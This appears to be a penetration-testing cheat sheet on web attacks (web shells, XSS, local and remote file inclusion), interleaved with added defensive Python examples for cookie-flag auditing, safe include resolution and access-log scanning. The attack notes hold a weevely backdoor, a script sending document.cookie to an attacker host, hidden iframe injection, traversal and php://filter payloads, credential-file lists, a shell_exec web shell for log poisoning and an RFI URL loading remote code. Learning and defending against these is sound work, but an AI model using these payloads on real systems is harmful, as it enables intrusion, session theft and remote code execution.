Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
Java Signed Applet Attack
HTTP / HTTPS Webserver Enumeration
OWASP Dirbuster
nikto -h $ip
Essential Iceweasel Add-ons
Cookies Manager Plus https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Cross Site Scripting (XSS)
XSS can have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim's browser to a malicious HTML page, and more.
Browser Redirection and IFRAME Injection
<iframe src="http://$ip/report" height="0" width="0"></iframe>
Stealing Cookies and Session Information
<script>
new Image().src="http://$ip/bogus.php?output="+document.cookie;
</script>
nc -nlvp 80
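The payload above only works because the session cookie is readable from script. The usual defence is to mark session cookies HttpOnly (and Secure, SameSite), which document.cookie then cannot reach. The following audit helper is an added example, not part of the original notes or any tool mentioned here: it parses Set-Cookie headers, reports session-like cookies that lack those attributes, and rebuilds a hardened header. The sample headers and cookie values are constructed.

```python
"""Audit Set-Cookie headers for the attributes that blunt cookie theft via XSS.
Added example (not from the original notes); sample headers are constructed."""
import re

# Constructed Set-Cookie headers from a hypothetical PHP application response.
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=3f9a1c2e7b; path=/",
    "Set-Cookie: theme=dark; path=/; Max-Age=31536000",
    "Set-Cookie: auth=abc123; path=/; Secure; HttpOnly; SameSite=Lax",
]

# Cookie names that look like session or auth tokens and must carry the flags.
SESSION_NAME_RE = re.compile(r"(sess|auth|token|sid)", re.IGNORECASE)
REQUIRED_FLAGS = ("HttpOnly", "Secure", "SameSite")


def parse_set_cookie(header):
    """Split one Set-Cookie line into (name, value, [(attr, attr_value), ...])."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = []
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs.append((key.strip(), val.strip()))
    return name.strip(), value.strip(), attrs


def missing_flags(header):
    """Return the protective attributes absent from a session-like cookie.

    Non-session cookies (by name) return an empty list, as do fully flagged ones.
    """
    name, _, attrs = parse_set_cookie(header)
    if not SESSION_NAME_RE.search(name):
        return []
    present = {key.lower() for key, _ in attrs}
    return [flag for flag in REQUIRED_FLAGS if flag.lower() not in present]


def harden(header):
    """Rebuild the header with HttpOnly, Secure and SameSite=Lax added if missing."""
    name, value, attrs = parse_set_cookie(header)
    present = {key.lower() for key, _ in attrs}
    for flag, val in (("HttpOnly", ""), ("Secure", ""), ("SameSite", "Lax")):
        if flag.lower() not in present:
            attrs.append((flag, val))
    rendered = [f"{name}={value}"] + [f"{k}={v}" if v else k for k, v in attrs]
    return "Set-Cookie: " + "; ".join(rendered)


def audit(headers):
    """Map each cookie name to the list of flags it is missing."""
    return {parse_set_cookie(h)[0]: missing_flags(h) for h in headers}


if __name__ == "__main__":
    for cookie, missing in audit(SAMPLE_HEADERS).items():
        print(f"{cookie}: {'missing ' + ', '.join(missing) if missing else 'ok'}")
    print(harden(SAMPLE_HEADERS[0]))
```

HttpOnly stops the cookie-stealing script, not the XSS itself; output encoding of untrusted data is still required, and an attacker who can run script can still act as the user from inside the page.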
File Inclusion Vulnerabilities
Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.
fimap - a Python tool that automates the discovery and exploitation of LFI/RFI vulnerabilities in PHP applications (think of it as sqlmap for LFI):
https://github.com/kurobeats/fimap
Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() page is present, it is usually possible to get a shell. If you don't know the location of the phpinfo page, fimap can probe for it, or you can use a tool like OWASP DirBuster.
For local file inclusion, look for user-controlled input reaching PHP's include() function, for example:
include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");
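Both include() calls above hand a user-controlled value straight to the filesystem. The fix is to treat the parameter as a key, not a path: accept only a known page name (or at least a strict character set), build the path yourself, and confirm the resolved path is still under the intended directory. The resolver below is an added example written in Python rather than the page's PHP; it is not from any project mentioned here, and the base directory /var/www/app/pages and the test inputs are assumed. The same three checks translate directly to PHP (in_array, preg_match, realpath plus a prefix check).

```python
"""Hardened replacement for include($_GET['page'].".php") style lookups.
Added example (not the page's PHP, not project code); paths are assumed."""
import os
import re

# A plain file stem only: no slashes, dots, colons or NUL bytes, so neither
# ../ traversal nor php:// wrappers nor http:// URLs can pass.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_include(user_value, base_dir, ext=".php", allowed=None):
    """Map an untrusted page/lang parameter to a file path inside base_dir.

    Raises ValueError for anything that is not a known stem, so the caller
    never passes attacker-controlled paths, wrappers or URLs to include().
    """
    if not isinstance(user_value, str) or "\x00" in user_value:
        raise ValueError("invalid parameter")
    if allowed is not None:
        # Strongest form: an explicit allowlist of page names.
        if user_value not in allowed:
            raise ValueError("unknown page")
    elif not SAFE_STEM.fullmatch(user_value):
        # Generic form: a character allowlist.
        raise ValueError("unknown page")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + ext))
    # Defence in depth: the resolved path must still sit under base_dir.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def try_resolve(user_value, base_dir="/var/www/app/pages", allowed=None):
    """Return the resolved path, or the rejection reason as a string."""
    try:
        return resolve_include(user_value, base_dir, allowed=allowed)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed inputs mirroring the payload shapes listed in these notes.
    for value in ["about", "../../../../etc/passwd",
                  "php://filter/convert.base64-encode/resource=index",
                  "admin\x00", "http://192.168.10.5/evil.txt"]:
        print(repr(value), "->", try_resolve(value))
    print(try_resolve("about", allowed={"index", "contact"}))
```

The explicit allowlist (allowed=...) is preferable whenever the set of pages is known; the regex form is for cases such as language files where names are added without code changes. The realpath check costs nothing and catches mistakes in either filter.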
LFI - Read a file's source through the php://filter wrapper (base64-encoded so the PHP is not executed), then decode it
curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '[^\ ]\{40,\}' | base64 -d
LFI - Download a file with base64 encoding
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmesg
/var/mail/root
/var/spool/cron/crontabs/root
LFI Windows Files:
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Local File Inclusion - In versions of PHP below 5.3 the appended extension can be cut off with a null byte (%00)
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
Contaminating Log Files
<?php echo shell_exec($_GET['cmd']);?>
For a remote file inclusion, look for unsanitized user input passed to the PHP include() function; in addition, php.ini must be configured to allow remote files:
/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "On"
include($_REQUEST["file"].".php");
Remote File Inclusion
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
<?php echo shell_exec("ipconfig");?>
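Every request shape shown in these notes (traversal with encoded slashes, php://filter reads, null-byte truncation, a remote URL in the LANG parameter, the cookie-stealing script reflected through a parameter) leaves a distinctive trace in the web server's access log. The scanner below is an added example, not part of the original notes or of fimap, nikto or any other tool named here: it parses Apache combined-format lines, URL-decodes the request target (twice, so %2F and %252F both surface as /), and tags each entry with the categories it matches. The log lines are constructed from the payload shapes on this page, not captured traffic.

```python
"""Tag LFI/RFI/XSS attempt signatures in access-log lines.
Added example (not from the original notes); the log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines modelled on the payloads in these notes.
SAMPLE_LOG = [
    '192.168.10.5 - - [10/Oct/2015:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.10.5 - - [10/Oct/2015:13:55:40 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.10.5 - - [10/Oct/2015:13:55:44 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.10.5 - - [10/Oct/2015:13:55:48 +0000] "GET /addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.168.10.5 - - [10/Oct/2015:13:55:52 +0000] "GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00 HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.168.10.5 - - [10/Oct/2015:13:55:56 +0000] "GET /search.php?q=%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2F192.168.10.5%2Fbogus.php%3Foutput%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Apache combined format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature rules applied to the decoded request target, in reporting order.
RULES = [
    ("lfi_traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("php_wrapper", re.compile(r"\b(php|data|expect|phar|zip)://", re.IGNORECASE)),
    ("null_byte", re.compile(r"\x00")),
    ("rfi_remote_url", re.compile(r"[?&][^=&]*=(https?|ftp)://", re.IGNORECASE)),
    ("xss", re.compile(r"(<script|<iframe|document\.cookie|\bon\w+\s*=)", re.IGNORECASE)),
]


def normalise(target):
    """URL-decode up to twice so single- and double-encoded payloads look alike."""
    decoded = target
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(line):
    """Parse one log line; return a dict with the matched rule names, or None."""
    match = LOG_RE.match(line)
    if not match:
        return None
    target = normalise(match.group("target"))
    hits = [name for name, rx in RULES if rx.search(target)]
    return {"ip": match.group("ip"), "status": int(match.group("status")),
            "target": target, "hits": hits}


def scan(lines):
    """Return only the parsed entries that matched at least one rule."""
    findings = []
    for line in lines:
        entry = classify(line)
        if entry and entry["hits"]:
            findings.append(entry)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["status"], ",".join(finding["hits"]), finding["target"][:70])
```

Pair the rule hits with the response status: a 200 on a traversal or php://filter request is far more interesting than a 404, and a burst of 404s from one source against many file names is the probing phase that precedes it. Encoded NUL bytes and php:// wrappers have no legitimate use in a query string and are safe to alert on outright.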